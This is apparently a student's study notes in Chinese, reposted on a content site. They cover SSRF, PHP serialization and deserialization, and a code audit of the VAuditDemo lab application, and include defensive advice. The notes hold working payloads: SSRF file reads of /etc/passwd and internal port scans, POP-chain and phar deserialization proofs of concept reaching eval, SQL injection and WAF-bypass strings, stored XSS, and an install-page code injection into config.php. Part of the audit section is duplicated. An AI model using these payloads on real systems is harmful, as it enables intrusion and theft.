3.5网安学习第三阶段第五周回顾(个人学习记录使用)

本周重点

①SSRF服务器端请求伪造

②序列化和反序列化

③Vaudit代码审计

本周主要内容

①SSRF服务器端请求伪造

一、概述

SSRF: server site request forgery (服务器端请求伪造)。

SSR: 服务端请求,A服务器通过函数向B服务器发送请求。

image-20240318233750859

SSRF发生的前提条件:

1、外网服务器接收到用户的参数,没有做严格的过滤和检查

2、外网服务器在调用内网服务器的时候,使用了用户传入的参数来调用内网服务器的接口。

二、代码样例

外网服务器代码:

<?php
	//注意这里的外网服务器并备有对传入参数做任何校验和过滤,直接调用内网服务器获取文件
	$fileurl = $_GET['file'];
    echo file_get_contents($fileurl);
?>

内网服务器代码:

<?php
	//注意这里内网服务器的代码是根据其他服务器传的文件地址参数来获取文件
    echo file_get_contents($_GET['fname']);
?>

三、场景

1、在线分享
早期的网站可以通过url地址分享内容给其他用户,此时,网站会根据目标网站主页的title或者<meta name="description" content="">标签中的content属性的内容来生成分享链接的,这样可以有更好的用户体验,例如早起的人人网的分享链接http://wiget.renren.com/***/?resourceUrl=http://www.duoduo.com/index.html,这个resourceUrl的值就是目标网站的地址

2.在线转码
有些网站提供代码转换服务,以适应不同的设备展示的需求。例如百度,腾讯等都提供这种服务。可以把自己公司的网页传给转码服务,然后,会自动对代码做适当修改,以适应不同的展示设备的分辨率,字体等等。提高用户体验。此时,这种服务的请求类似于:http://www.baidu.com/convert?resource=http://www.abc.com/index.html

3.在线翻译
跟在线转码差不多

4.图像水印
可以给图片加水印,那么图片的地址就是动态传入的参数。

5.图片或者文章收藏。
收藏保存的文章或图片的url地址,获取的时候,就是传入文章地址参数。

四、探测关键字

在浏览器的查看源代码的功能中,查询包含下列关键字的网页

share
wap
url
link
src
source
target  
u
3g
display
sourceURL
imageURL
domain
location
remote

五、判断SSRF存在

1、有回显

使用请求伪造给外网服务器发请求,看看是否有相应内容,有可能回显内容会经过一些处理,只显示部分内容。

2、无回显

在无任何回显的情况下,可以使用下面的方式进一步判断

(1)DNSlog : 在dnslog.cn上申请一个临时域名,把域名传入给外网的接口

http://192.168.121.128/ssrf/getfiles?file=http://xxx.bbb.ccc

然后去dnslog.cn上查看域名解析的结果,如果能看到,说明传入的参数file的值,是被直接传给内网服务器作为参数的。

(2)租用公网服务器(例如:IP地址是1.112.10.101),测试,并查看日志

把下面文件ssrf.php放在有公网ip的服务器上

<?php
echo "test ssrf";
?>

访问被探测的服务器的请求url

http://192.168.121.128/ssrf/getfiles?file=http://1.112.10.101/ssrf.php

这里就是借助被探测的服务器来访问黑客自己公网服务器上的文件ssrf.php,可以查看黑客的服务器日志,如果请求正常就进入到黑客的公网服务器,那么说明被探测的服务器是直接把file=http://1.112.10.101/ssrf.php作为请求参数传入的。

六、三个函数

我们要分三种情况来讨论,因为对方的外网服务器可能会采取下面这三个函数中的任意一个来请求他的内网服务器,不同的函数利用方式有细微差别

file_get_contents()     可以发送get|post请求
fsockopen()             只能发送get请求
curl_exec()             可以发送get|post请求

1、file_get_contents()

GET请求:
echo file_get_contents($_GET['file']);

POST请求:
$url = $_GET['url'];
$content = $_GET['content'];
$name = $_GET['name'];

$data = "content=$content&name=$name";

$options = ['http'=>[
                    'method'=>'POST',
                    'header'=>"Content-Type:application/x-www-form-urlencoded",
                    'content'=>$data
]];

$context = stream_context_create($options);

echo file_get_contents($url,false,$context);

2、fsockopen()

GET请求:
$f = fsockopen("192.168.32.129",80);

$param="GET /secure21/html/calc.html HTTP/1.1\r\n";
$param.="Host:192.168.32.129\r\n";
$param.="Connection:close\r\n\r\n";

fwrite($f,$param);

while(!feof($f)){
   echo fread($f,1024);
}
fclose($f);

POST请求:
$f = fsockopen("192.168.150.128",80);

$param = "POST /ssrf/1.php HTTP/1.1\r\n";
$param = $param."Host: 192.168.150.128\r\n";
$param = $param."User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0\r\n";
$param = $param."Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$param = $param."Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\n";
$param = $param."Accept-Encoding: gzip, deflate\r\n";
$param = $param."Connection: Close\r\n";
$param = $param."Content-Type: application/x-www-form-urlencoded\r\n";
$param = $param."Content-Length: 26\r\n\r\n";
$param = $param."content=hello&name=zhangan";


fwrite($f,$param);
while(!feof($f)){
    echo fread($f,1024);
}

fclose($f);

3、curl_exec()

get请求:
$cu = curl_init();  curl_setopt($cu,CURLOPT_URL,"http://192.168.32.129/secure21/html/calc.html");
curl_setopt($cu,CURLOPT_HEADER,0);//不输出响应头
curl_exec($cu);
curl_close($cu);

post请求:
$cu = curl_init();    $arr[CURLOPT_URL]="http://192.168.32.129/secure21/php/demo6.php";
$arr[CURLOPT_HEADER]=0;//不输出响应头
$arr[CURLOPT_RETURNTRANSFER]=1;//设置接受返回值
$arr[CURLOPT_POST]=1;//请求方式
$arr[CURLOPT_POSTFIELDS]="content=ssrfcurl_exec&name=post";//请求参数

curl_setopt_array($cu,$arr);

echo curl_exec($cu);
curl_close($cu);
?>

七、SSRF危害

1、可以对服务器外网,内网进行端口扫描

2、通过外网服务器,获取内网服务器的一些资源

3、探测一些应用程序的指纹信息

http://192.168.150.128/ssrf/curlweb.php?f=dict://192.168.150.129:3306/info

curlweb.php代码

<?php

$url=$_GET['f'];
$cu = curl_init();
curl_setopt($cu,CURLOPT_URL,$url);
curl_setopt($cu,CURLOPT_HEADER,0);//响应头不输出
curl_exec($cu);
curl_close($cu);
?>

如果mysql在3306端口运行那么会返回一些信息。

image-20240325111914726

4、攻击内外网的web应用(例如sql注入等)

5、利用file,dict,gopher,http,https等协议读取本地文件,访问敏感目标,反弹shell等高危操作

gopher也可以用来探测mysql的指纹信息

八、利用

1、读取存在ssrf漏洞系统所在服务器的本地文件

(1)针对使用file_get_contents的情况:payload

http://192.168.121.128/ssrf/getfiles?file=/etc/passwd

(2)针对使用curl_exec的情况:payload:(file://是文件访问协议)

http://192.168.121.128/ssrf/curlgetfiles?file=file:///etc/passwd

还可以使用其他的伪协议

http://192.168.121.128/ssrf/curlgetfiles?file=php://input

post data:
{"name":"zhangsan","age":12}

其他伪协议可以参考文件包含的部分

2、远程资源获取

1、通过http扫ip

http://192.168.121.128/ssrf/getfiles?file=http://192.168.12.127 #有返回说明有服务开启
http://192.168.121.128/ssrf/getfiles?file=http://192.168.12.126 #没有返回说明没有服务开启
如此测试可以发现内网存在哪些开放80端口的应用

2、通过dict扫端口

注意这个协议不能跟file_get_contents一起使用。可以跟curl_exec()一起用

http://192.168.121.128/ssrf/getcurlfiles?file=dict://192.168.12.127:8000 #有返回说明有服务开启
http://192.168.121.128/ssrf/getcurlfiles?file=dict://192.168.12.126:8000 #没有返回说明没有服务开启

3、gopher也可以扫端口(不能跟file_get_contents一起使用)

http://192.168.121.128/ssrf/getcurlfiles?file=gopher://192.168.12.127:80 #有返回说明有服务开启
http://192.168.121.128/ssrf/getcurlfiles?file=gopher://192.168.12.126:80 #没有返回说明没有服务开启

九、防御

1、白名单:限制ip和域名

2、白名单:限制端口

3、白名单:限制协议;

注意白名单限制一定要写完整的白名单,例如:定义一个数组,把能访问的文件列表放进数组

whiteList = ["http://192.168.12.128/files/tcp/alluser.txt","http://192.168.12.128/files/tcp/depts.txt"]

判断的时候,请求的url路径也需要跟上面数组定义的完全吻合才可以放行。

白名单中不能只放入ip地址,后者域名,那样很容易被绕过,例如whiteList=["192.168.12.128","192.168.12.129"]

这种白名单很容易被绕过

http://192.168.12.128@102.168.123.122/file/tcp/allusers.txt

注意192.168.12.128@102.168.123.122的意思是要访问102.168.123.122的主机,使用192.168.12.128作为登录的用户名。

4、用户需要认证。每次请求要验证用户的身份,需要先获取令牌,或者登录。

5、屏蔽底层错误信息,避免用户根据错误信息来判断服务器的端口状态

6、限制重定向操作

当使用curl_exec()函数的时候,可以设置参数CURLOPT_FOLLOWLOCATION=false来限制header("Location:list.php")这种通过响应头的重定向机制,不能限制js端的重定向。
如果要向限制js端的重定向,需要对响应的内容进行判断,查找其中的location.href这类的字样
$res = curl_exec()
if(	stripos($res,'location.href')==false )
    echo $res;
else 
    die();

7、避免直接使用请求带来的参数,可以根据请求的参数,转成请求对应资源。这种相当于写死了能够请求的资源

$re = $_GET['f']
if($re==1){
   请求:http://102.168.123.122/file/tcp/allusers.txt
}
if($re==2){
   请求:http://102.168.123.122/file/tcp/depts.txt
}

8、限制url请求的长度

十、绕过

1、IP地址使用十进制

工具网站:https://www.bejson.com/convert/ip2int/

http://1696940379

这种可以绕过使用了黑名单限制后台程序。

2、生成短链接可以绕过针对url地址长度的限制。

②序列化和反序列化

一、面向对象

1、类:

类:具有相同属性和行为的事物。

对象: 类的实例化个体。

2、访问修饰符

属性:0u
	public
	protected
	private
方法:
    public
    protected
    private
    
private只能在类中使用
protected修饰的可以在本类和子类中使用
private不能被继承。

3、静态方法

1.通过static关键字定义的方法:在该方法中,不能使用$this;
2.静态方法随类一起被加载:所以静态方法可以被类名或者对象调用;
3.静态方法中不能调用实例方法。

4、类的结构

class 类名{
	访问修饰符 ;  //属性
	访问修饰符 function 方法名(形参列表){     //方法
		方法体;
	}
}

5、样例代码

<?php

class Animal{
    private $ace;
    protected $height="animal height----";
    public $name="animal name----";
    public $oice="animal oice----";
    

    public function talk(){
        echo "animal talks<br>";
        $this->sing();
    }
    protected function swim(){
        echo "animal swims<br>";
    }
    private function sing(){
        echo "animal sings<br>";
    }
    
    public function setAce($a){
        $this->ace = $a;
    }
    public function getAce(){
        echo $this->ace."<br>";
    }

    public static function run(){
        
        echo "static method:animal run<br>";
    }

}

class Dog extends Animal{
    public $oice="dog oice<br>";

    public function talk(){
        echo "dog talks<br>";
    }
    public function play(){
        $this->swim();

        echo "dog play<br>";
    }
    
    public function getName(){
        echo $this->name;
    }
    public function getHeight(){
        echo $this->height;
    }
    public function getOice(){
        echo $this->oice;
    }
}
$animal = new Animal;
$animal->talk()."<br>";
$animal->setAce("11111");
echo $animal->getAce()."<br>";
Animal::run();//调用静态方法
echo ">>>>>>>>>>>>>>>>>>>>>....<br>";
$dog = new Dog;
$dog->talk();
$dog->play();
$dog->getName();
$dog->getHeight();
$dog->getOice();

?>

6、魔术方法

方法描述
__construct( )新对象被创建时候调用
__destruct()对象被销毁时候调用
__call()在对象中调用一个不可访问方法时,__call()会被调用。
__callStatic()在静态上下文中调用一个不可访问方法时,__callStatic() 会被调用。
__get()读取不可访问(protected 或 private)或不存在的属性的值时会被调用
__set()在给不可访问(protected 或 private)或不存在的属性赋值时会被调用
__isset()当对不可访问(protected 或 private)或不存在的属性调用 isset()或 empty() 时,__isset() 会被调用。
__unset()当对不可访问(protected 或 private)或不存在的属性调用 unset()时,__unset() 会被调用。
__sleep()执行序列化操作时候先执行这个方法
__wakeup()执行反序列化操作时候先执行这个方法
__toString()当一个类对象被当成字符串使用的时候会调用
__invoke()当尝试以调用函数的方式调用一个对象时这个方法会调用
__clone()当复制完成时,如果定义了__clone() 方法,则新创建的对象(复制生成的对象)中的 __clone() 方法会被调用,可用于修改属性的值(如果有必要的话)。

二、序列化和反序列化

1、序列化:字符串中,只包含类名和属性。与方法无关。

1.serialize()函数生成:
将php中类复制到另一个文件中,删除所有方法,只保留属性和与赋值相关的构造方法。
通过serialize(new 类名)得到序列化字符串
2.手工写:
O:长度:"类名":属性数量:{数据类型:长度:"属性名字";i:值;xxx}
O:长度:"类名":属性数量:{数据类型:长度:"属性名字";s:长度:值;xxxx}

2、反序列化: 源码中,定义的程序入口。通过unserialize()函数实现。

$obj = unserialize($_GET['str']);   //将序列化字符串还原成对象

3、使用场景:

当请求时候,需要传递的参数是对象的时候。

发请求的代码:

<?php
class Animal{
    private $ace;
    protected $height="animal height----";
    public $name="animal name----";
    public $oice="animal oice----";
    

    public function talk(){
        echo "animal talks<br>";
        $this->sing();
    }
    protected function swim(){
        echo "animal swims<br>";
    }
    private function sing(){
        echo "animal sings<br>";
    }
    
    public function setAce($a){
        $this->ace = $a;
    }
    public function getAce(){
        echo $this->ace."<br>";
    }

    public static function run(){
        
        echo "static method:animal run<br>";
    }

}
$animal = new Animal;
$animaljson = base64_encode(serialize($animal));
$cu = curl_init();
$arr =[];
$arr[CURLOPT_URL]="http://192.168.150.129/receiveobj.php";
$arr[CURLOPT_HEADER]=0;
$arr[CURLOPT_RETURNTRANSFER]=1;
$arr[CURLOPT_POST]=1;
$arr[CURLOPT_POSTFIELDS]=$animaljson;

curl_setopt_array($cu,$arr);

echo curl_exec($cu);

curl_close($cu);
?>

被请求的代码

<?php

class Animal{
    private $ace;
    protected $height;
    public $name;
    public $oice;


    public function talk(){
        echo "animal talks<br>";
    }
    protected function swim(){
        echo "animal swims<br>";
    }
    private function sing(){
        echo "animal sings<br>";
    }

    public function setAce($a){
        $this->ace = $a;
    }
    public function getAce(){
        echo $this->ace."<br>";
    }


}

$o = file_get_contents("php://input");
echo $o;
echo "<br>";

$dog1 = unserialize(base64_decode($o));
echo $dog1->getAce();
?>

4、反序列化漏洞利用前提

1、对象必须以序列化后的字符串形式在页面之间传递,说白了就是要让用户可以用可控的输入点。
2、在类定义中,在以上的魔术方法中,能够在反序列化时候被调用到的魔术方法中存在一些危险函数,例如eval。

三、调用链

POP即:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链。在控制代码或者程序的执行流程后就能够使用这一组调用链做一些工作了。

一般的序列化攻击都在PHP魔术方法中出现可利用的漏洞,因为自动调用触发漏洞,但如果关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。

我们在寻找深层次调用链时,使用终点向上查找的方法,或是开始点查找的方法。来找到反序列化漏洞。

使用以下代码,实现任意命令的调用。

<?php

class Tiger{
    public $string;
    protected $var;
    public function __toString(){
        return $this->string;
    }
    public function boss($value){
        @eval($value);
    }
    public function __invoke(){
        $this->boss($this->var);
    }
}
class Lion{
    public $tail;
    public function __construct(){
        $this->tail = array();
    }
    public function __get($value){
        $function = $this->tail;
        return $function();
    }
}
class Monkey{
    public $head;
    public $hand;
    public function __construct($here="Zoo"){
        $this->head = $here;
        echo "Welcome to ".$this->head."<br>";
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->head)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
class Elephant{
    public $nose;
    public $nice;
    public function __construct($nice="nice"){
        $this->nice = $nice;
        echo $nice;
    }
    public function __toString(){
        return $this->nice->nose;
    }
}
if(isset($_GET['zoo'])){
    @unserialize($_GET['zoo']);
}
else{
    $a = new Monkey;
    echo "Hello PHP!";
}

?>

构造好的POC

<?php
    class Tiger{
        public $string;
        protected $var = "phpinfo();";
    }
    class Lion{
        public $tail;
        public function __construct(){
            $this->tail = new Tiger();
        }
    }
    class Monkey{
        public $head;
        public $hand;
        public function __construct($here="Zoo"){
            $this->head = new Elephant();
        }
    }
    class Elephant{
        public $nose;
        public $nice;
        public function __construct($nice="nice"){
            $this->nice = new Lion();
        }
    }
    $monkey = new Monkey();
    echo urlencode(serialize($monkey));//注意用urlencode编码一下,否则protected和private修饰的属性会有些字符无法显示
?>

image-20240325210910218

四、phar反序列化漏洞

1、条件:生成phar压缩文件。

1.php.ini文件中,phar.readonly=Off
2.存放phar压缩文件的目录必须有写权限。

2、phar文件结构

1.stub: <?php __HALT_COMPILER();?>   PHAR文件声明
2.metadata: 元数据,声明数据的数据。用来支持如指示存储位置、历史数据、资源查找、文件记录等功能。
3.content: 被压缩的文件
4.signature: 签名

1、stub
stub的基本结构:<?php __HALT_COMPILER();?>前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。
2、meta-data
phar文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这里即为反序列化漏洞点。
3、content
被压缩文件的内容。
4、signature
签名,放在文件末尾。

3、构造访问phar的代码,文件命名为phar.php:

<?php
class Vul{
	public $data;
	function __destruct(){
        @eval($this->data);
    }
}
$filename = 'phar://test.phar/test.txt';
file_exists($filename);
?>

生成压缩文件test.phar的代码,文件名为createphar.php

注意:createphar.php当前目录需要有写权限

<?php
class Vul{
	public $data="phpinfo();";
}

@unlink("test.phar");//删除已有的文件
$phar=new Phar("test.phar");   
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");
$v = new Vul;
$phar->setMetaData($v);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();

?>

触发漏洞

访问http://192.168.150.128/phar.php

image-20240325213402277

③Vaudit代码审计

一、安装

1、上传vaudit压缩文件到/opt/lampp/htdocs

2、解压缩

unzip VAuditDemo-master.zip

3、修改目录名称

cd /opt/lampp/htdocs
cd VAuditDemo-master
mv VAuditDemo_Debug vaudit
cd ..
mv VAuditDemo-master vaudit

4、修改httpd.conf文件

vi /opt/lampp/etc/httpd.conf
添加一个端口
Listen 81

image-20240323105811462

image-20240323110143594

保存并退出。

5、编辑httpd-vhost.conf

vi /opt/lampp/etc/extra/httpd-vhosts.conf
把文件中的原来内容全部删除,并把下面的内容输入到文件中
<VirtualHost *:81>
    serverName localhost
    DocumentRoot "/opt/lampp/htdocs/vaudit/vaudit"
</VirtualHost>

6、重启lampp

/opt/lampp/xampp restart

7、访问项目首页

http://192.168.217.128:81/index.php

可以看到url跳转到系统安装的地址

http://192.168.217.128:81/install/install.php

image-20240323111111459

8、修改目录和文件权限

chmod o+w /opt/lampp/htdocs/vaudit/vaudit/sys
chmod o+w /opt/lampp/htdocs/vaudit/vaudit/uploads
chmod o+w /opt/lampp/htdocs/vaudit/vaudit/sys/config.php

再次访问页面,

http://192.168.217.128:81/install/install.php

看到下面的页面,说明修改成功

image-20240323111336374

在以上页面输入正确的数据库地址,用户名,密码点击安装按钮。数据库名称不用修改,就使用vauditdemo。

如果数据库已经存在,那么先删掉数据库,再点击安装按钮。

看到下面的页面,说明安装成功。

image-20240323112259014

二、代码审计

1、安装漏洞

可以反复执行安装程序

http://192.168.217.128:81/install/install.php

使用burp拦截请求后可以看到安装页面上默认的数据库信息。

原因是

header( "Location: ../index.php" );页面跳转并不能停止php其余代码的执行和返回结果

需要在header后面增加die(),终止php程序运行。

2、XSS漏洞

在主页的留言搜索框,xss注入漏洞。

3、注册页面

没有验证码,可以通过循环遍历,注册无数的用户。

4、普通用户登录

没有验证码可以暴力破解

登录logCheck.php

admin'--logCheck--》
$_SESSION['username'] = $row['user_name'];
$_SESSION['avatar'] = $row['user_avatar'];
登录成功后,返回到 user.php,此时下面的查询会出现sql注入风险
研究一下session中的username是否会有sql注入的可能:admin' limit 2,1#
$query = "SELECT * FROM users WHERE user_name = '{$_SESSION['username']}'";
$_SESSION['user_id'] = $result['user_id'];

5、二次注入

先注册一个用户名中反斜杠结尾的用户,例如:zhangsan\

重新登录

发帖子,来到messageSub.php

	$clean_message = clean_input($_POST['message']);//直接使用发帖内容做sql注入不行
	//这个sql语句,从session获取的用户名带一个反斜杠,会注释掉'{$_SESSION['username']}'后面的单引号。此时可以构造一个留言的payload
	$query = "INSERT INTO comment(user_name,comment_text,pub_date) VALUES ('{$_SESSION['username']}','$clean_message',now())";
	

留言payload是:

,(SELECT DATABASE ( ) ), now( ) )#
6、任意文件读取

avatar.php中的

echo file_get_contents($_SESSION['avatar']);

$_SESSION[‘avatar’]在登录的时候,从users表中获取的avater的值,放入session

users表中获取的avater的值,是从上传头像时候保存进数据库。

updateAvatar.php:

$query = "UPDATE users SET user_avatar = '$avatar' WHERE user_id = '{$_SESSION['user_id']}'";

构造上传文件的文件名的payload,需要用burp拦截修改的。

',user_avatar=0x2f6574632f706173737764 where user_name='wangwu'#.jpg
7、越权

在更新用户名的页面,提交请求后,updateName.php,根据浏览器传入的userid来修改数据库记录

  $clean_user_id = clean_input($_POST['id']);
  $query = "UPDATE users SET user_name = '$clean_username' WHERE user_id = '$clean_user_id'";

我们可以用burp拦截,把id修改成其他人的。

image-20240328104600832
8、首页上有文件包含漏洞

首页包含的文件有后缀.inc,所以使用phar伪协议方式

制作一个一句话木马文件,a.inc,放入到压缩文件b.zip,把b.zip改名为b.jpg,

上传之后,在首页文件包含的地方访问,用phar协议

9、管理员登录的url地址不应该暴露给c端用户
http://192.168.218.128:81/admin/login.php
10、管理员登录页面

验证码可以重复使用

11、登录验证过程

logCheck.php

$query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";

这里的ip是从请求头来的

我们可以修改请求头x-forwarded-for,

注入一个xss存储型

<script>alert(1)</script>
12、任意linux命令执行

管理员ping的功能,可以使用管道符来执行任意linux命令

13、sql注入

messageDetail.php页面

	$id = sqlwaf( $_GET['id'] );
	$query = "SELECT * FROM comment WHERE comment_id = $id";

sqlwaf有逻辑漏洞。可以使用payload注入,

?id=9 uni||on se||lect 1,2,3,database() limi||t 1,1
14、SQL注入+越权

登录成功后跳转,看到user.php中,

$query = "SELECT * FROM users WHERE user_name = '{$_SESSION['username']}'";
$_SESSION['user_id'] = $result['user_id'];

怀疑有sql注入风险,如果用户名中有单引号就可以造成注入。根据用户名查询到的user_id放入到session,那么,以后更新操作都根据user_id,就可能导致越权。

下面就是研究如何能让session的username有单引号出现。

查看regCheck.php,这里clean_input只是对单引号,双引号,反斜线做了防御

	$clean_name = clean_input($_POST['user']);
	$clean_pass = clean_input($_POST['passwd']);

那么这个insert语句就可以注册用户名含有单引号的账号

$query = "INSERT INTO users(user_name,user_pass,user_avatar,join_date) VALUES ('$clean_name',SHA('$clean_pass'),'$avatar','$date')";

再去看logCheck.php

$query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";

从数据库中查询用户信息,包含用户名和用户的id,并且把从数据库查到的用户名放入session,那么session中的用户名就会存在单引号。

$_SESSION['username'] = $row['user_name'];

我们可以考虑先注册一个带有单引号的用户名,然后在去更改用户信息。就能够越权修改其他用户的信息了

注册的用户名长度不能超过16个字符长度,所以可以使用

'||1 limit 2,1#
15、系统重新安装漏洞
POST /install/install.php HTTP/1.1
Host: 192.168.218.128:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=p1t2n3j5ejheqf2hbohuhuk337
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

dbhost=localhost&dbuser=root&dbpass=1234&Submit=sub&dbname=aaaa;#";phpinfo();//

可以写入一句话木马到config.php

这个insert语句就可以注册用户名含有单引号的账号

$query = "INSERT INTO users(user_name,user_pass,user_avatar,join_date) VALUES ('$clean_name',SHA('$clean_pass'),'$avatar','$date')";

再去看logCheck.php

$query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";

从数据库中查询用户信息,包含用户名和用户的id,并且把从数据库查到的用户名放入session,那么session中的用户名就会存在单引号。

$_SESSION['username'] = $row['user_name'];

我们可以考虑先注册一个带有单引号的用户名,然后在去更改用户信息。就能够越权修改其他用户的信息了

注册的用户名长度不能超过16个字符长度,所以可以使用

'||1 limit 2,1#
15、系统重新安装漏洞
POST /install/install.php HTTP/1.1
Host: 192.168.218.128:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=p1t2n3j5ejheqf2hbohuhuk337
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

dbhost=localhost&dbuser=root&dbpass=1234&Submit=sub&dbname=aaaa;#";phpinfo();//

可以写入一句话木马到config.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/510336.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

OurBMC技术委员会2024年一季度例会顺利召开

3 月 28 日&#xff0c;OurBMC 社区技术委员会一季度例会顺利召开。本次会议汇报了 OurBMC 社区一季度工作总结&#xff0c;规划了二季度重点工作&#xff0c;同时针对产业化落地 SIG 实施方案开展了深入讨论。 本次会议采取线上线下形式举行&#xff0c;由 技术委员会主席李煜…

手撸一个简易 Grid 拖拽布局

公众号&#xff1a;程序员白特&#xff0c;欢迎一起交流学习~ 以下文章来源于稀土掘金技术社区 &#xff0c;作者游仙好梦 最近有个需求需要实现自定义首页布局&#xff0c;需要将屏幕按照 6 列 4 行进行等分成多个格子&#xff0c;然后将组件可拖拽对应格子进行渲染展示。 对比…

Java基础之流程控制语句(循环)

文章目录 Java基础之流程控制语句(循环)1.顺序结构2.分支结构if语句的第一种格式if语句的第二种格式if语句的第三种格式Switch语句格式Switch的其他知识点default的位置和省略case穿透Switch的新特性 3.循环结构循环的分类for 循环while 循环for循环 与 while循环 的对比 4.do.…

Java毕业设计 基于SSM学生选课系统

Java毕业设计 基于SSM学生选课系统 SSM jsp 学生选课系统 功能介绍 学生&#xff1a;登录 注册 全部课程 未选课程 已选课程 添加课程 删除课程 推荐课程 搜索 个人资料 修改信息 修改密码 我的选课 管理员&#xff1a; 登录 注册 课程管理 添加修改删除课程 课程查看 查看选…

新华三交换机配置开启Web图形界面

新华三交换机配置开启Web图形界面 1. 交换机桥接到电脑&#xff0c;电脑配置网络ip 2. 交换机配置ip&#xff0c;可ping通。 <H3c>sys System View: return to User View with CtrlZ.[H3c]inter vlan 1[H3c-Vlan-interface1]ip add 192.168.3.20 24[H3c-Vlan-interface1…

LLMs 可能在 2 年内彻底改变金融行业

在艾伦图灵研究所&#xff08;The Alan Turing Institute&#xff09;最新的一项研究中&#xff0c;我们看到了大型语言模型&#xff08;Large Language Models&#xff0c;LLMs&#xff09;的一种可能性。它有望通过检测欺诈行为、生成财务洞察以及自动化客户服务&#xff0c;…

android 使用ollvm混淆so

使用到的工具 ndk 21.4.7075529&#xff08;android studio上下载的&#xff09;cmake 3.10.2.4988404&#xff08;android studio上下载的&#xff09;llvm-9.0.1llvm-mingw-20230130-msvcrt-x86_64.zipPython 3.11.5 环境配置 添加cmake mingw环境变量如下图: 编译 下载…

在Windows中查找电脑序列号的几种方法,看看有没有适合你的

序言 Windows不会在其界面的任何位置显示PC的序列号,流行的系统信息工具也不会。但你通常可以通过简单的命令、在BIOS中查看或在硬件本身上查找PC的序列号。 运行WMIC命令 打开命令提示符或PowerShell窗口以开始。在Windows 11、Windows 10或Windows 8上,右键单击开始按钮…

蓝桥杯刷题第六天(昨天忘记发了)

今天想从不一样的角度来解题&#xff1a;从时间紧张暴力求解到思路阔达直接通过所有案例 暴力方法&#xff1a; 思路第一眼看到这个问题我就想到了第一个思路就是先用两个数组一个存石子数一个存颜色状态&#xff0c;每次遍历一遍看看有没有相邻石子颜色一样且为和最小的。 im…

64B66B编码详解

文章目录 前言一、64B66B的实现方式二、64B66B数据帧格式 前言 参考&#xff1a;https://blog.chinaaet.com/justlxy/p/5100064750 64B66B是我们在高速通信协议中的一种处理PHY层发送数据的编码。为何我们要编码&#xff0c;直接把原数据发送出去不行吗&#xff1f;答案是当然…

opengl草稿复习,承上启下(一)

目录 1、链接文件夹中的cpp 2、链接资源到输出目录 3、多编译目标 4、cmakelist添加库 4、添加glfw和glad 5、glfw运行 6、NDC、VBO、VAO 7、渐变三角形 8、渲染两个三角形 9、渲染两个三角形&#xff0c;同时基于原来颜色进行渐变 10、三角形渲染模块化 11、纹理渲…

26版SPSS操作教程(初级第十四章)

前言 #由于导师最近布置了学习SPSS这款软件的任务&#xff0c;因此想来平台和大家一起交流下学习经验&#xff0c;这期推送内容接上一次第十三章的学习笔记&#xff0c;希望能得到一些指正和帮助~ 粉丝及官方意见说明 #针对官方爸爸的意见说的推送缺乏操作过程的数据案例文件…

GT收发器PHY层设计(2)GT_module模块设计

文章目录 前言一、设计框图二、例化IP核端口三、common_reset_i模块四、gt_usrclk_source模块五、IBUFDS_GTE2和gtwizard_0_common模块六、顶层模块gt_module总结 前言 根据官方的example design设计一个自定义协议的高速PHY设计 一、设计框图 设计思路及代码思路参考FPGA奇哥…

mysql 数据库基本操作

mysql 数据库基本操作 1、创建五张表 – user 表&#xff1a;后台用户表 – product 表&#xff1a;产品表 – account 表&#xff1a;客户账户表 – product_account 表 : 客户购买表 – customer 表 &#xff1a; 客户表 2、创建表 SQL 语句&#xff1a; 注意&#xff1a…

简单而复杂的Python

Python是一种简单&复杂的编程语言。简单的时候可以到极致&#xff1a; print(hello world!)另一方面&#xff0c;Python 也具有许多复杂的语法特性&#xff0c;例如面向对象编程、装饰器、迭代器、生成器等等。这些特性使得 Python 适用于各种不同的编程任务和项目。 当我…

ROS中的栅格地图

目录 一、ROS中栅格地图格式 二、C节点发布地图 2.1 发布者发布地图的C实现 三、python节点发布地图 一、ROS中栅格地图格式 机器人导航所使用的地图数据&#xff0c;就是ROS导航软件包里的map_server 节点&#xff0c;在话题/map中发布的消息数据&#xff0c;消息类型是na…

智能锁也能用上GPT技术了?大扭力电机更配中国门?这家公司再次引领行业

